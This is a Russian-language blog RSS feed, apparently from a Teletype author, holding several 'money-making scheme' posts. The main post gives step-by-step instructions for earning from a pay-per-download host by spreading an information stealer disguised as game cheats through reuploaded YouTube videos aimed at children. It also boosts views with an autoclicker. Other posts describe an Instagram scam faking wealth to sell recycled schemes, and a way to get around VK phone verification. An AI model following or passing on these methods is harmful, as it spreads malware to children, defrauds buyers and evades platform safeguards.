  <p>Уязвимости «Gmail Zero Day» встречаются очень редко. Это в основном лазейки в защите отдельных узлов системы, о которых не знает «Google». Но компания «Google» использует бонусную программу «Google Bug Bounty» для поиска таких ошибок и их устранения.</p>
  <p>Есть два типа людей, которые обнаруживают уязвимость нулевого дня. Первый – это специалисты по компьютерной безопасности и энтузиасты-исследователи ошибок со всего мира, которые тестируют продукты «Google» (в нашем случае «Gmail») и сообщают о найденных уязвимостях безопасности в соответствующую службу для их исправления.</p>
  <p>Второй – это хакеры (так называемые «Blackhat»), которые обнаруживают уязвимость нулевом дня, но не раскрывают ее, а используют для своей личной выгоды.</p>
  <h3><strong>Как защититься от «Gmail Zero Day»?</strong></h3>
  <p>Как мы уже говорили ранее, уязвимости нулевого дня очень редки и в основном они нацелены только на влиятельных людей и знаменитостей. Для атаки на учетные записи обычных пользователей они практически не применяются.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/r1SBqbr-E</guid><link>https://teletype.in/@torion/r1SBqbr-E?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/r1SBqbr-E?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>200$ за неделю без вложений</title><pubDate>Sat, 29 Dec 2018 14:52:44 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/5d/5dda4906-70a7-40e0-a7e1-eb5b283b603e.png"></media:content><description><![CDATA[<img src="https://tgraph.io/file/3ebbcf6b29e69b6dcbd2b.png"></img>Зарабатывать мы будет на скам-файлообменнике, который платит за каждое скачивание вашего файла. На самом деле там не ваш файл, а простой стилер.]]></description><content:encoded><![CDATA[
  <p>Зарабатывать мы будет на скам-файлообменнике, который платит за каждое скачивание вашего файла. На самом деле там не ваш файл, а простой стилер.</p>
  <blockquote>По этому крайне не рекомендую! самому скачивать и запускать файлы, которые вы загружаете на файлообменник.</blockquote>
  <p>А вот на наивных американских школьниках можно и срубить кэша.</p>
  <p>И так приступим:</p>
  <p>Во-первых я вас познакомлю с сайтом <a href="https://pinapfile.com/?rf=26384" target="_blank">pinapfile</a>.</p>
  <p>Регистрируемся на файлообменнике <a href="https://pinapfile.com/?rf=26384" target="_blank">https://pinapfile.com</a> -</p>
  <p>(яндекс может писать, что этот сайт не безопасный. Он полностью безопасен!!! С вашим компьютером ничего не случится, это нормальная практика для сайтов-файлообменников.)</p>
  <p>Для более нормального заработка нам понадобится зарубежный трафик. Т.к данный сайт платит в среднем за одно уникальной скачивание из США около 1.2$. Ниже на скриншоте цены указаны</p>
  <p>более подробно:</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/3ebbcf6b29e69b6dcbd2b.png" width="404" />
  </figure>
  <p>1.Регистрируемся на данном сайте.<a href="https://pinapfile.com/?rf=26384" target="_blank"> тык</a></p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/18e398dccd599d67712c4.png" width="355" />
  </figure>
  <p>Для этого нажимаем на Sign up. И далее пишем свою почту и имя. И нажимаем Sign Up for Free.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/e37b44f72a41cbee9a8ea.png" width="572" />
  </figure>
  <p>После данных действий, вам на почту придет сообщение с подтверждением. В котором будет находится пароль от аккаунта.</p>
  <p>ВАЖНО: Ha [@Mail.ru НЕ ПРИДЕТ,ИСПОЛЬЗУЙТЕ @Gmail.com] (ЕСЛИ ПИСЬМО НЕ ПРИХОДИТ ПРОВЕРЬТЕ В СПАМЕ!).</p>
  <p>Поздравляю вы зарегистрировались!</p>
  <p>Теперь переходим к следующему этапу:</p>
  <p>2. Заходим на аккаунт и переходим в вкладку Files (Файлы).Здесь мы будем добавлять любой фаил (желательно архив. Переименовываем свой архив) например Private Hack v3.5).</p>
  <p>Вот ФАЙЛ можете переделать его под себя,и под свою игру. (Называем файл так, потому что мы будем заливать видео на youtube с читами для популярных игр и с нашей ссылкой. Youtube это бесплатный зарубежный траффик, а читы на игры всегда популярны в поисковых запросах.</p>
  <p>Далее поговорим об этом подробней.)</p>
  <p>После данных действия появляется файл:</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/bc208c928fb7274d65050.png" width="468" />
  </figure>
  <p>Нажимаем на синюю кнопку. И копируем ссылку на файл.</p>
  <p>Советую данную ссылку сократить, есть множество сайтов для сокращения ссылок ( например https://bitly.com )</p>
  <p>Итак файл мы залили, теперь будем распространять.</p>
  <p>3.Распространение файла на youtube.</p>
  <p>Нам понадобится аккаунт google с youtube каналом. Его можно купить или зарегистрировать самому. А у большинства он есть.</p>
  <p>Фаил будем распространять как чит на популярные игры такие как - PUBG,ROBLOX,UNTURNED.(игры можно подбирать самому,даже нужно,т.к. чем больше видео с &quot;читами&quot; залить с различными играми - профита будет больше)</p>
  <p>Заходим на youtube и вводим в поиске PUBG hack</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/e1095ceb65e9860bbe9c7.png" width="449" />
  </figure>
  <p>Ищем видео, где будет демонстрация читов.</p>
  <p>Скачиваем любое из данных видео (можно воспользоваться сайтом https://ru.savefrom.net)</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/5527c761e18ad2c11b15e.png" width="562" />
  </figure>
  <p>4.Теперь заливаем данное видео на свой youtube канал.</p>
  <p>Название можно взять с видео, которое скачали и описание. И не забудьте в описании добавить ссылку на свой фаил.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/9ffc04a17b1fcc757787e.png" width="678" />
  </figure>
  <p>Можете воспользоваться сервисом по скачиванию превью с видео - https://alexbruni.ru/youtube2images/</p>
  <p>И всё ждем просмотров и скачиваний.</p>
  <p>ВАЖНО - что бы профит был в первые 3 дня,советую взять накрутку на видео.</p>
  <p>(например1-2к просмотров и 50+ лайков) или другие способы распространения зависит от вашей фантазии, всё это позволит вывести ваши видео в топ по поиску.</p>
  <p>Специально для хороших людей,один мой хороший знакомый сливает для вас &quot;АВТОКЛИКЕР&quot; для YTmonster.ru -<a href="https://yadi.sk/d/Ute4iu2BiAFfPQ" target="_blank">АВТОКЛИКЕР(яндекс диск)</a> <a href="http://rgho.st/85N6jtVYw" target="_blank">АВТОКЛИКЕР(rghost)</a>(сервис по накрутке просмотров,лайков,подписчиков на ютубе)</p>
  <p>Как работает кликер,запускаете кликер,заходите на</p>
  <p><a href="https://ytmonster.ru/?r=309808" target="_blank">-сайт</a></p>
  <p>- Выполнить задание</p>
  <p>- запускаете кликер</p>
  <p>-выбираете каждые координаты</p>
  <p>- в кликере выбираете &quot;Время ожидания в задании&quot; - 30 сек</p>
  <p>-жмет старт,курим сиги,пьем чай, пока работает кликер и фармит вам баланс</p>
  <p>Пробуйте разные игры CS PUBG DOTA2 и т.д Советую заливать видео вечером или ночью. Т.к в Америке другой часовой пояс. И конечно же пруфы</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/r14lsdfbV</guid><link>https://teletype.in/@torion/r14lsdfbV?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/r14lsdfbV?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Слив рабочей схемы за 35К</title><pubDate>Thu, 27 Dec 2018 16:16:44 GMT</pubDate><description><![CDATA[Мы будем зарабатывать на людях, которые хотят заработать (Собственно, как всегда)]]></description><content:encoded><![CDATA[
  <ul>
    <li>СУТЬ СХЕМЫ</li>
  </ul>
  <p>Мы будем зарабатывать на людях, которые хотят заработать (Собственно, как всегда)</p>
  <p>Заработок идет с помощью соц. сети Instagram</p>
  <p>Мы создаем себе профиль богатого человечка, раскручиваем аккаунт, делаем мульты с ссылками на мейн профиль и продаем доступ в закрытый телеграмм канал с (вы не поверите) паблик схемами заработка, которые каждый может найти, если захочет.</p>
  <p>По сути схема действительно белая, потому что есть реальный продукт за который человек платит деньги и подкопаться с юридической стороны, практически невозможно. Но я все равно рекомендую использовать левую симку и левые почты, дабы не засорять ваше личное информационное поле.</p>
  <p>Какие ресурсы используются для раскрутки:</p>
  <p><a href="https://smmplanner.com/" target="_blank">SMMPLANNER</a> - для стабильного выхода постов</p>
  <p><a href="https://instarobot.pro/" target="_blank">INSTAROBOT</a> - и вот та самая программа, за которую ты по сути платишь 35к в премиум пакете. Функционал посмотрите сами.</p>
  <p>Ну и еще куча мультов с ссылкой на основной профиль, если нужно тоже их приложу.</p>
  <h3>Расходы:</h3>
  <p>Собственно, кроме расходов на саму схему - их не так много.</p>
  <p>- Левая симка (желательно купленная физически, чтобы иметь возможность принимать звонки)</p>
  <p>Можно использовать и основную симку в принципе.</p>
  <p>- Ну и реклама в инсте, сколько денег тратить на рекламу? Да сколько хотите. Можно и 500 рублей и 5000+</p>
  <h3>Как происходит сделка:</h3>
  <ul>
    <li>- Человек, увидевший наш профиль в каком то рекламном посте, обращается к нам в директ или по другим контактам.</li>
    <li>- Общаетесь с ним от имени администратора канала, потому что ваше основное лицо человек очень занятой.</li>
    <li>- Лично я делал доступ в телеграмм канал пожизненным, некоторые делают месячные тарифы, тут уже как вам хочется.</li>
    <li>- Человек скидывает вам денежку, желательно иметь максимально возможно широкий диапазон приема платежей, начиная от вебмани и заканчивая приемом на номер телефона оператора.</li>
    <li>- Вы даете ему доступ к каналу и раз в неделю заливаете туда какую нибудь паблик схему</li>
    <li>- Готово, вы миллионер.</li>
  </ul>
  <p><strong>Где брать фотографии богатых людей? Ищите там же в инстаграме, только из-за бугра. Ну или посидите на нашем канале пару месяцев, и сфоткайте себя.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/Skgt5uzbN</guid><link>https://teletype.in/@torion/Skgt5uzbN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/Skgt5uzbN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Создание страницы в VK без использования номера телефона</title><pubDate>Thu, 27 Dec 2018 16:14:48 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/2e/2e04f324-57b7-4a36-b606-07ead6018ab5.png"></media:content><description><![CDATA[<img src="https://tgraph.io/file/93486529c91f46518ab7b.jpg"></img>Будем пользоваться такой функцией VK, как приглашение друзей и родственников.]]></description><content:encoded><![CDATA[
  <p>Будем пользоваться такой функцией VK, как приглашение друзей и родственников.</p>
  <p>Отправляем приглашение на почту (vk.com/invite). После приглашения, страница создается сразу.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/93486529c91f46518ab7b.jpg" width="556" />
  </figure>
  <p>Далее нужно восстановить пароль от приглашенной страницы, через почту, т.к после приглашения страница создается, но пароль от нее мы не знаем.</p>
  <p>После изменения пароля заходим на страницу и смотрим. Если вас закинуло на страницу указания пола, возраста и привязке к телефону – это хорошо. Вы можете попытаться открыть что-то, через адресную строку, но вас будет перекидывать на привязку к телефону.</p>
  <p>Заходим на страницу по API. В меню слева заходим в настройки (1). Далее нажимаем &quot;Аккаунт&quot; (2). В графе &quot;Настройка страницы&quot; нажимаем на &quot;Сохранить&quot; (3).</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/1c564787cd7921ed7c6cf.jpg" width="835" />
  </figure>
  <p>Готово. Теперь можно заходить на страницу VK, и вас не будет редиректить на страницу привязки телефона.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/1353269018da22fe6d32f.jpg" width="542" />
  </figure>
  <p>Данный способ немного убогий, потому что в некоторых случаях нужно обязательно привязывать номер (например, после создания группы, и дальнейшем переводе её в страницу).</p>

]]></content:encoded></item></channel></rss>